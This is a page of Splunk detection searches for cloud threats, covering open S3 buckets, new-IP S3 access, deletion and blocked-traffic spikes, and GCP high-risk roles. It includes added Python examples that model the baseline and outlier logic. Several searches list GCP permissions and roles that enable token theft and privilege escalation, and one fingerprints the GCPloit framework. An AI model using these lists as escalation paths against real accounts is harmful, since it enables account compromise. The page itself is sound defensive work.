This search relies on the Splunk Add-on for Google Cloud Platform, setting up a Cloud Pub/Sub input, along with the relevant GCP PubSub topics and logging sink to capture GCP Storage Bucket events (https://cloud.google.com/logging/docs/routing/overview).

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that a GCP admin has legitimately created a public bucket for a specific purpose. That said, GCP strongly advises against granting full control to the "allUsers" group.

Reference

Test Dataset

version: 1


Detect new open s3 buckets over aws cli

This search looks for CloudTrail events where a user has created an open/public S3 bucket over the AWS CLI.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventSource="s3.amazonaws.com" eventName=PutBucketAcl OR requestParameters.accessControlList.x-amz-grant-read-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-write-acp IN ("*AuthenticatedUsers","*AllUsers") OR requestParameters.accessControlList.x-amz-grant-full-control IN ("*AuthenticatedUsers","*AllUsers") | rename requestParameters.bucketName AS bucketName | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId userAgent bucketName requestParameters.accessControlList.x-amz-grant-read requestParameters.accessControlList.x-amz-grant-read-acp requestParameters.accessControlList.x-amz-grant-write requestParameters.accessControlList.x-amz-grant-write-acp requestParameters.accessControlList.x-amz-grant-full-control | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_over_aws_cli_filter`

Associated Analytic Story


How To Implement

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.

Reference

Test Dataset


version: 1


Detect new open s3 buckets

This search looks for CloudTrail events where a user has created an open/public S3 bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2021-01-12

Search

`cloudtrail` eventSource=s3.amazonaws.com eventName=PutBucketAcl | rex field=_raw "(?<json_field>{.+})" | spath input=json_field output=grantees path=requestParameters.AccessControlPolicy.AccessControlList.Grant{} | search grantees=* | mvexpand grantees | spath input=grantees output=uri path=Grantee.URI | spath input=grantees output=permission path=Permission | search uri IN ("http://acs.amazonaws.com/groups/global/AllUsers","http://acs.amazonaws.com/groups/global/AuthenticatedUsers") | search permission IN ("READ","READ_ACP","WRITE","WRITE_ACP","FULL_CONTROL") | rename requestParameters.bucketName AS bucketName | stats count min(_time) as firstTime max(_time) as lastTime by userName userIdentity.principalId userAgent uri permission bucketName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_new_open_s3_buckets_filter`
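An added example (not Splunk's or AWS's own code) that applies the public-grant logic of this search and of the "Detect new open s3 buckets over aws cli" search above to CloudTrail PutBucketAcl records in Python. The record shapes are assumptions, since only the field paths appear on the page: the AWS CLI form stores grantees under requestParameters.accessControlList["x-amz-grant-*"] as "uri=<group URI>" strings, and the full-ACL form stores a Grant list (or a single Grant dict) under requestParameters.AccessControlPolicy.AccessControlList; all sample records are constructed.

```python
"""Flag CloudTrail PutBucketAcl records that grant access to a public S3 group.

Added example, not Splunk's code. Record layouts below are assumptions (see lead-in).
"""
from typing import Any, Dict, List, Tuple

# Group URIs the page's search treats as public.
PUBLIC_GROUP_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}
# x-amz-grant-* headers from the AWS CLI search, mapped to the permission each grants.
GRANT_HEADERS = {
    "x-amz-grant-read": "READ",
    "x-amz-grant-read-acp": "READ_ACP",
    "x-amz-grant-write": "WRITE",
    "x-amz-grant-write-acp": "WRITE_ACP",
    "x-amz-grant-full-control": "FULL_CONTROL",
}

Grant = Tuple[str, str, str]  # (bucketName, group URI, permission)


def _as_list(value: Any) -> List[Any]:
    """spath's Grant{} yields a single dict when there is one grant; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def public_grants(record: Dict[str, Any]) -> List[Grant]:
    """Return every public grant in a PutBucketAcl record, or [] for any other event."""
    if record.get("eventSource") != "s3.amazonaws.com" or record.get("eventName") != "PutBucketAcl":
        return []
    params = record.get("requestParameters") or {}
    bucket = params.get("bucketName", "<unknown-bucket>")
    found: List[Grant] = []

    # Form 1 (AWS CLI --grant-* options): x-amz-grant-* headers holding comma-separated "uri=..." entries.
    headers = params.get("accessControlList") or {}
    for header, permission in GRANT_HEADERS.items():
        for grantee in str(headers.get(header, "")).split(","):
            grantee = grantee.strip()
            if grantee.startswith("uri=") and grantee[4:] in PUBLIC_GROUP_URIS:
                found.append((bucket, grantee[4:], permission))

    # Form 2 (full ACL document): AccessControlPolicy.AccessControlList.Grant entries.
    acl = (params.get("AccessControlPolicy") or {}).get("AccessControlList") or {}
    for grant in _as_list(acl.get("Grant")):
        uri = (grant.get("Grantee") or {}).get("URI")
        permission = grant.get("Permission")
        if uri in PUBLIC_GROUP_URIS and permission in GRANT_HEADERS.values():
            found.append((bucket, uri, permission))
    return found


def scan(records: List[Dict[str, Any]]) -> List[Dict[str, str]]:
    """One row per public grant, keyed the way the search's stats ... by userName bucketName is."""
    rows = []
    for record in records:
        for bucket, uri, permission in public_grants(record):
            rows.append({"userName": (record.get("userIdentity") or {}).get("userName", "<unknown-user>"),
                         "bucketName": bucket, "uri": uri, "permission": permission})
    return rows


# Constructed sample records (not real CloudTrail data; user and bucket names are placeholders).
SAMPLE_RECORDS = [
    {   # CLI form: --grant-read uri=http://acs.amazonaws.com/groups/global/AllUsers
        "eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl",
        "userIdentity": {"userName": "alice"},
        "requestParameters": {"bucketName": "example-bucket-1",
                              "accessControlList": {"x-amz-grant-read": "uri=http://acs.amazonaws.com/groups/global/AllUsers"}},
    },
    {   # Full ACL document: owner plus FULL_CONTROL for AuthenticatedUsers
        "eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl",
        "userIdentity": {"userName": "bob"},
        "requestParameters": {"bucketName": "example-bucket-2", "AccessControlPolicy": {"AccessControlList": {"Grant": [
            {"Grantee": {"ID": "OWNERCANONICALID", "xsi:type": "CanonicalUser"}, "Permission": "FULL_CONTROL"},
            {"Grantee": {"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers", "xsi:type": "Group"},
             "Permission": "FULL_CONTROL"}]}}},
    },
    {   # Private ACL: a single owner grant (one dict, not a list) and no group URI
        "eventSource": "s3.amazonaws.com", "eventName": "PutBucketAcl",
        "userIdentity": {"userName": "carol"},
        "requestParameters": {"bucketName": "example-bucket-3", "AccessControlPolicy": {"AccessControlList": {"Grant":
            {"Grantee": {"ID": "OWNERCANONICALID", "xsi:type": "CanonicalUser"}, "Permission": "FULL_CONTROL"}}}},
    },
    {   # Different API call on the same service: ignored
        "eventSource": "s3.amazonaws.com", "eventName": "GetBucketAcl",
        "userIdentity": {"userName": "alice"}, "requestParameters": {"bucketName": "example-bucket-1"},
    },
]

if __name__ == "__main__":
    for row in scan(SAMPLE_RECORDS):
        print(row)
```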

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

While this search has no known false positives, it is possible that an AWS admin has legitimately created a public bucket for a specific purpose. That said, AWS strongly advises against granting full control to the "All Users" group.

Reference

Test Dataset


version: 2


Detect s3 access from a new ip

This search looks at S3 bucket-access logs and detects new or previously unseen remote IP addresses that have successfully accessed an S3 bucket.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2018-06-28

Search

`aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200 | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip | inputlookup append=t previously_seen_S3_access_from_remote_ip.csv | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip | outputlookup previously_seen_S3_access_from_remote_ip.csv | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | table bucket_name remote_ip] | iplocation remote_ip |rename remote_ip as src_ip | table _time bucket_name src_ip City Country operation request_uri | `detect_s3_access_from_a_new_ip_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your S3 access logs' inputs. This search works best when you run the "Previously Seen S3 Bucket Access by Remote IP" support search once to create a history of previously seen remote IPs and bucket names.

Required field

ATT&CK

ID Technique Tactic
T1530 Data from Cloud Storage Object Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

S3 buckets can be accessed from any IP, as long as it can make a successful connection. Such access will be a false positive, since the search is simply looking for a new IP within the past hour.

Reference

Test Dataset

version: 1


Detect spike in aws security hub alerts for ec2 instance

This search looks for a spike in the number of AWS Security Hub alerts for an EC2 instance in 4-hour intervals.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

`aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h _time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account) as vendor_account values(vendor_region) as vendor_region values(severity) as severity by _time dest | eventstats avg(alerts) as total_alerts_avg, stdev(alerts) as total_alerts_stdev | eval threshold_value = 3 | eval isOutlier=if(alerts > total_alerts_avg+(total_alerts_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time dest alerts Title Types vendor_account vendor_region severity isOutlier total_alerts_avg | `detect_spike_in_aws_security_hub_alerts_for_ec2_instance_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. Tune threshold_value to your environment, and schedule these searches according to the bucket span interval.

Required field

Kill Chain Phase

Known False Positives

None

Reference

Test Dataset


version: 3


Detect spike in aws security hub alerts for user

This search looks for a spike in the number of AWS Security Hub alerts for an AWS IAM user in 4-hour intervals.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2021-01-26

Search

`aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev | eval threshold_value = 2 | eval isOutlier=if(alerts > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time user alerts |`detect_spike_in_aws_security_hub_alerts_for_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. Tune threshold_value to your environment and schedule these searches according to the bucket span interval.
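The two Security Hub spike searches (the EC2 instance and IAM user variants) share one statistical test: count findings per 4-hour bucket and per entity, compute the average and standard deviation over all those rows with eventstats, and flag any row above avg + threshold_value * stdev. The following is an added example, not code from the Splunk Security Content project, that models that test offline in Python on constructed findings so that the effect of threshold_value can be checked before scheduling the search. The instance ids, timestamps and counts are constructed sample values; the only assumption carried over from the SPL is that stdev() is the sample standard deviation, which is undefined for a single row, in which case the SPL comparison against a null stdev is false and nothing is flagged.

```python
"""Added example: the 4-hour bucket / mean + k*stdev outlier test used by the
Security Hub spike searches, modelled offline on constructed findings."""
from collections import defaultdict
from datetime import datetime, timezone
from statistics import mean, stdev

BUCKET_SECONDS = 4 * 3600   # `bucket span=4h _time`
THRESHOLD_VALUE = 3         # `eval threshold_value = 3` (number of standard deviations)


def bucket_counts(findings, span=BUCKET_SECONDS):
    """`stats count AS alerts by _time dest` after bucketing: {(bucket_start, dest): alerts}."""
    counts = defaultdict(int)
    for ts, dest in findings:
        counts[(ts - ts % span, dest)] += 1
    return dict(counts)


def spike_threshold(alerts, k=THRESHOLD_VALUE):
    """`eventstats avg(alerts) ... stdev(alerts)` over every (bucket, dest) row.
    Splunk's stdev() is the sample standard deviation, undefined for a single row;
    the SPL comparison against a null stdev is false, so None means 'no threshold'."""
    if len(alerts) < 2:
        return None
    return mean(alerts) + k * stdev(alerts)


def find_outliers(findings, k=THRESHOLD_VALUE, span=BUCKET_SECONDS):
    """Rows whose alert count exceeds avg + k*stdev, i.e. the rows with isOutlier=1.
    Returns a sorted list of (bucket_start, dest, alerts)."""
    counts = bucket_counts(findings, span)
    threshold = spike_threshold(list(counts.values()), k)
    if threshold is None:
        return []
    return sorted((b, d, n) for (b, d), n in counts.items() if n > threshold)


def constructed_findings():
    """Constructed sample, not real Security Hub data: 6 buckets x 4 instances with two
    findings each, plus 38 extra findings for one instance in the fifth bucket.
    Each finding is (epoch seconds, resource id); instance ids are hypothetical."""
    base = int(datetime(2021, 1, 26, tzinfo=timezone.utc).timestamp())
    instances = [f"i-0example{n:04d}" for n in range(4)]
    findings = []
    for b in range(6):
        for dest in instances:
            for k in range(2):
                findings.append((base + b * BUCKET_SECONDS + k * 60, dest))
    spike_bucket = base + 4 * BUCKET_SECONDS
    findings.extend((spike_bucket + 300 + k, instances[2]) for k in range(38))
    return findings


if __name__ == "__main__":
    for bucket_start, dest, alerts in find_outliers(constructed_findings()):
        when = datetime.fromtimestamp(bucket_start, timezone.utc).isoformat()
        print(f"{when} {dest} alerts={alerts}")
```

With 23 rows of 2 alerts and one row of 40, the sample standard deviation is about 7.8, so the threshold lands near 27 and only the 40-alert row is flagged; lowering threshold_value to 1 would already flag nothing extra here, but on a quieter fleet with fewer rows a single spike inflates the standard deviation enough to hide itself, which is the reason the page asks you to tune the value per environment.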

Required field

Kill Chain Phase

Known False Positives

None

Reference

Test Dataset

version: 3


Detect spike in s3 bucket deletion

This search detects users generating spikes in API activity related to deleting S3 buckets in your AWS environment. It also updates the baseline lookup (cache file) so that it factors in the latest data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1530
  • Last Updated: 2018-11-27

Search

`cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup s3_deletion_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | spath output=bucketName path=requestParameters.bucketName | stats values(bucketName) as bucketName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_s3_bucket_deletion_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points the baseline must contain before it is treated as statistically significant enough to determine a spike. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of S3 Bucket deletion activity by ARN" support search once to create a baseline of previously seen S3 bucket-deletion activity.

Required field

ATT&CK

ID      Technique                        Tactic
T1530   Data from Cloud Storage Object   Collection


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Based on the values of `dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify these according to your environment.

Reference

Test Dataset

version: 1


Detect spike in blocked outbound traffic from your aws

This search detects spikes in blocked outbound network connections originating from within your AWS environment. It also updates the baseline lookup (cache file) so that it factors in the latest data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-05-07

Search

`cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) | stats count as numberOfBlockedConnections by src_ip | inputlookup baseline_blocked_outbound_connections append=t | fields - latestCount | stats values(*) as * by src_ip | rename numberOfBlockedConnections as latestCount | eval newAvgBlockedConnections=avgBlockedConnections + (latestCount-avgBlockedConnections)/720 | eval newStdevBlockedConnections=sqrt(((pow(stdevBlockedConnections, 2)*719 + (latestCount-newAvgBlockedConnections)*(latestCount-avgBlockedConnections))/720)) | eval avgBlockedConnections=coalesce(newAvgBlockedConnections, avgBlockedConnections), stdevBlockedConnections=coalesce(newStdevBlockedConnections, stdevBlockedConnections), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table src_ip, latestCount, numDataPoints, avgBlockedConnections, stdevBlockedConnections | outputlookup baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold = 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip] | stats values(dest_ip) as "Blocked Destination IPs", values(interface_id) as "resourceId" count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the number of data points required to meet the definition of "spike." The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Blocked Outbound Connection" support search once to create a history of previously seen blocked outbound connections.

Required field

Kill Chain Phase

  • Actions on Objectives
  • Command and Control


Known False Positives

The false-positive rate may vary based on the values of `dataPointThreshold` and `deviationThreshold`. Additionally, false positives may result when AWS administrators roll out policies enforcing network blocks, causing sudden increases in the number of blocked outbound connections.
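The S3 bucket deletion search and the blocked outbound traffic search share the same running-baseline mechanism: the subsearch reads a lookup of per-entity average, standard deviation and data-point count, folds this run's count into those statistics with a fixed 720-point window, writes the lookup back with outputlookup, and only then tests the latest count against avg + deviationThreshold * stdev, gated by dataPointThreshold. The following is an added example, not code from the Splunk Security Content project, that reproduces that eval chain term for term in Python so the two thresholds can be reasoned about on constructed data. The ARNs, baseline rows and event counts are constructed; the 720 and 719 constants, the coalesce() behaviour for entities with no activity in the run, and the fact that an entity absent from the baseline has null statistics (so it cannot spike until the support search seeds it) are taken from the SPL as written.

```python
"""Added example: the running-baseline update and spike test shared by the S3 bucket
deletion and blocked-outbound-traffic searches, modelled in Python on constructed data."""
import math
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Optional

WINDOW = 720                 # the 720 / 719 constants in the SPL eval chain
DATA_POINT_THRESHOLD = 15    # `dataPointThreshold` (S3 search; the VPC flow search uses 5)
DEVIATION_THRESHOLD = 3      # `deviationThreshold`


@dataclass(frozen=True)
class BaselineRow:
    """One row of the baseline lookup: avgApiCalls, stdevApiCalls, numDataPoints."""
    avg: float
    stdev: float
    num_data_points: int


def update_row(row: BaselineRow, latest: Optional[int], window: int = WINDOW) -> BaselineRow:
    """The SPL arithmetic, term for term:
       newAvg   = avg + (latest - avg) / 720
       newStdev = sqrt((stdev^2 * 719 + (latest - newAvg) * (latest - avg)) / 720)
    If the entity had no activity this run (latestCount is null) coalesce() keeps the
    old values and numDataPoints is not incremented."""
    if latest is None:
        return row
    new_avg = row.avg + (latest - row.avg) / window
    variance = (row.stdev ** 2 * (window - 1) + (latest - new_avg) * (latest - row.avg)) / window
    return BaselineRow(new_avg, math.sqrt(variance), row.num_data_points + 1)


def is_spike(row: BaselineRow, latest: Optional[int],
             data_point_threshold: int = DATA_POINT_THRESHOLD,
             deviation_threshold: float = DEVIATION_THRESHOLD) -> bool:
    """`isSpike=if((latestCount > avg + deviationThreshold*stdev) AND numDataPoints > dataPointThreshold, 1, 0)`,
    evaluated against the already-updated row, exactly as the search does."""
    return (latest is not None
            and latest > row.avg + deviation_threshold * row.stdev
            and row.num_data_points > data_point_threshold)


def count_by_entity(events) -> Counter:
    """`stats count as apiCalls by arn` over (arn, eventName) pairs, keeping only DeleteBucket."""
    return Counter(arn for arn, event_name in events if event_name == "DeleteBucket")


def run_detection(baseline: Dict[str, BaselineRow], latest_counts: Dict[str, int],
                  window: int = WINDOW, data_point_threshold: int = DATA_POINT_THRESHOLD,
                  deviation_threshold: float = DEVIATION_THRESHOLD):
    """Returns (baseline to write back with outputlookup, sorted list of spiking entities)."""
    updated: Dict[str, Optional[BaselineRow]] = {}
    spikes = []
    for entity in set(baseline) | set(latest_counts):
        row = baseline.get(entity)
        latest = latest_counts.get(entity)
        if row is None:
            # Faithful to the SPL: with null avg/stdev every eval yields null, so an entity
            # absent from the baseline is written back without statistics and cannot spike
            # until the baseline support search seeds it.
            updated[entity] = None
            continue
        new_row = update_row(row, latest, window)
        updated[entity] = new_row
        if is_spike(new_row, latest, data_point_threshold, deviation_threshold):
            spikes.append(entity)
    return updated, sorted(spikes)


# Hypothetical ARNs for the constructed run (placeholder account id, not a real account).
SEASONED = "arn:aws:iam::111111111111:user/seasoned"   # well-baselined, spikes this run
NEWISH = "arn:aws:iam::111111111111:user/newish"       # same spike, too few data points
IDLE = "arn:aws:iam::111111111111:user/idle"           # in the baseline, no activity this run
UNSEEN = "arn:aws:iam::111111111111:user/unseen"       # very active, but never baselined


def constructed_run():
    """Constructed baseline rows and CloudTrail-like events; not real data."""
    baseline = {
        SEASONED: BaselineRow(avg=2.0, stdev=1.0, num_data_points=20),
        NEWISH: BaselineRow(avg=2.0, stdev=1.0, num_data_points=5),
        IDLE: BaselineRow(avg=3.0, stdev=0.5, num_data_points=40),
    }
    events = ([(SEASONED, "DeleteBucket")] * 20 + [(NEWISH, "DeleteBucket")] * 20
              + [(UNSEEN, "DeleteBucket")] * 50 + [(SEASONED, "ListBuckets")] * 3)
    return baseline, count_by_entity(events)


if __name__ == "__main__":
    updated, spikes = run_detection(*constructed_run())
    print("spiking:", spikes)
    for entity, row in sorted(updated.items()):
        print(entity, row)
```

Two things the run makes visible: the newish user issues the same 20 deletions as the seasoned one but is suppressed purely by dataPointThreshold, and the unseen user with 50 deletions produces nothing at all, which is the gap the "run the baseline support search once" advice in How To Implement closes.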

Reference

Test Dataset

version: 1


Gcp detect accounts with high risk roles by project

This search provides detection of accounts with high risk roles by project. Compromised accounts with high risk roles can move laterally or even escalate privileges across projects, depending on the organization's structure.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

`google_gcp_pubsub_message` data.protoPayload.request.policy.bindings{}.role=roles/owner OR roles/editor OR roles/iam.serviceAccountUser OR roles/iam.serviceAccountAdmin OR roles/iam.serviceAccountTokenCreator OR roles/dataflow.developer OR roles/dataflow.admin OR roles/composer.admin OR roles/dataproc.admin OR roles/dataproc.editor | table data.resource.type data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.authorizationInfo{}.resource data.protoPayload.response.bindings{}.role data.protoPayload.response.bindings{}.members{} | `gcp_detect_accounts_with_high_risk_roles_by_project_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for GCP. This search works with gcp:pubsub:message logs.

Required field

ATT&CK

ID      Technique        Tactic
T1078   Valid Accounts   Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

Accounts with high risk roles should be reduced to the minimum number needed; however, specific tasks and setups may simply be expected behavior within the organization.

Reference


Test Dataset

version: 1


Gcp detect gcploit framework

This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-08

Search

`google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s | table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.request.location http_user_agent | `gcp_detect_gcploit_framework_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for GCP. This search works with gcp:pubsub:message logs.

Required field

ATT&CK

ID      Technique        Tactic
T1078   Valid Accounts   Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

The protoPayload.request.function.timeout value can possibly match other functions or requests; however, the source user and the target request account may indicate an attempt to move laterally across accounts or projects.

Reference


Test Dataset

version: 1


Gcp detect high risk permissions by resource and account

This search provides detection of high risk permissions by resource and accounts. These are permissions that can allow attackers with compromised accounts to move laterally and escalate privileges.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-10-09

Search

`google_gcp_pubsub_message` data.protoPayload.authorizationInfo{}.permission=iam.serviceAccounts.getaccesstoken OR iam.serviceAccounts.setIamPolicy OR iam.serviceAccounts.actas OR dataflow.jobs.create OR composer.environments.create OR dataproc.clusters.create |table data.protoPayload.requestMetadata.callerIp data.protoPayload.authenticationInfo.principalEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.response.bindings{}.members{} data.resource.labels.project_id | `gcp_detect_high_risk_permissions_by_resource_and_account_filter`

Associated Analytic Story


How To Implement

You must install the Splunk Add-on for GCP. This search works with gcp:pubsub:message logs.

Required field

ATT&CK

ID      Technique        Tactic
T1078   Valid Accounts   Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

High risk permissions are part of any GCP environment; however, it is important to track resource and account usage, and this search may produce false positives.

Reference


Test Dataset

version: 1


Gcp kubernetes cluster pod scan detection

This search provides information on unauthenticated requests against a Kubernetes cluster's pods, including the user agent and authentication data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-07-17

Search

`google_gcp_pubsub_message` category=kube-audit |spath input=properties.log |search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod | `gcp_kubernetes_cluster_pod_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure Stackdriver and set up a Pub/Sub subscription to be imported into Splunk.

Required field

ATT&CK

ID      Technique                 Tactic
T1526   Cloud Service Discovery   Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, User Agent, source IPs and pods will provide context.

Reference

Test Dataset

version: 1


Gcp kubernetes cluster scan detection

This search provides information on unauthenticated requests against a Kubernetes cluster, including the user agent and authentication data.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1526
  • Last Updated: 2020-04-15

Search

`google_gcp_pubsub_message` data.protoPayload.requestMetadata.callerIp!=127.0.0.1 data.protoPayload.requestMetadata.callerIp!=::1 "data.labels.authorization.k8s.io/decision"=forbid "data.protoPayload.status.message"=PERMISSION_DENIED data.protoPayload.authenticationInfo.principalEmail="system:anonymous" | rename data.protoPayload.requestMetadata.callerIp as src_ip | stats count min(_time) as firstTime max(_time) as lastTime values(data.protoPayload.methodName) as method_name values(data.protoPayload.resourceName) as resource_name values(data.protoPayload.requestMetadata.callerSuppliedUserAgent) as http_user_agent by src_ip data.resource.labels.cluster_name | rename data.resource.labels.cluster_name as cluster_name | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `gcp_kubernetes_cluster_scan_detection_filter`

Associated Analytic Story


How To Implement

You must install the GCP App for Splunk (version 2.0.0 or later), then configure Stackdriver and set up a Pub/Sub subscription to be imported into Splunk. You must also install the Cloud Infrastructure data model. Customize the macro kubernetes_gcp_scan_fingerprint_attack_detection to filter out false positives.

Required field

ATT&CK

ID      Technique                 Tactic
T1526   Cloud Service Discovery   Discovery


Kill Chain Phase

  • Reconnaissance


Known False Positives

Not all unauthenticated requests are malicious, but frequency, User Agent and source IPs will provide context.

Reference

Test Dataset

version: 1


High number of login failures from a single source

This search will detect more than 5 login failures in Office365 Azure Active Directory from a single source IP address. Please adjust the threshold value of 5 as suited for your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1110.001
  • Last Updated: 2020-12-16

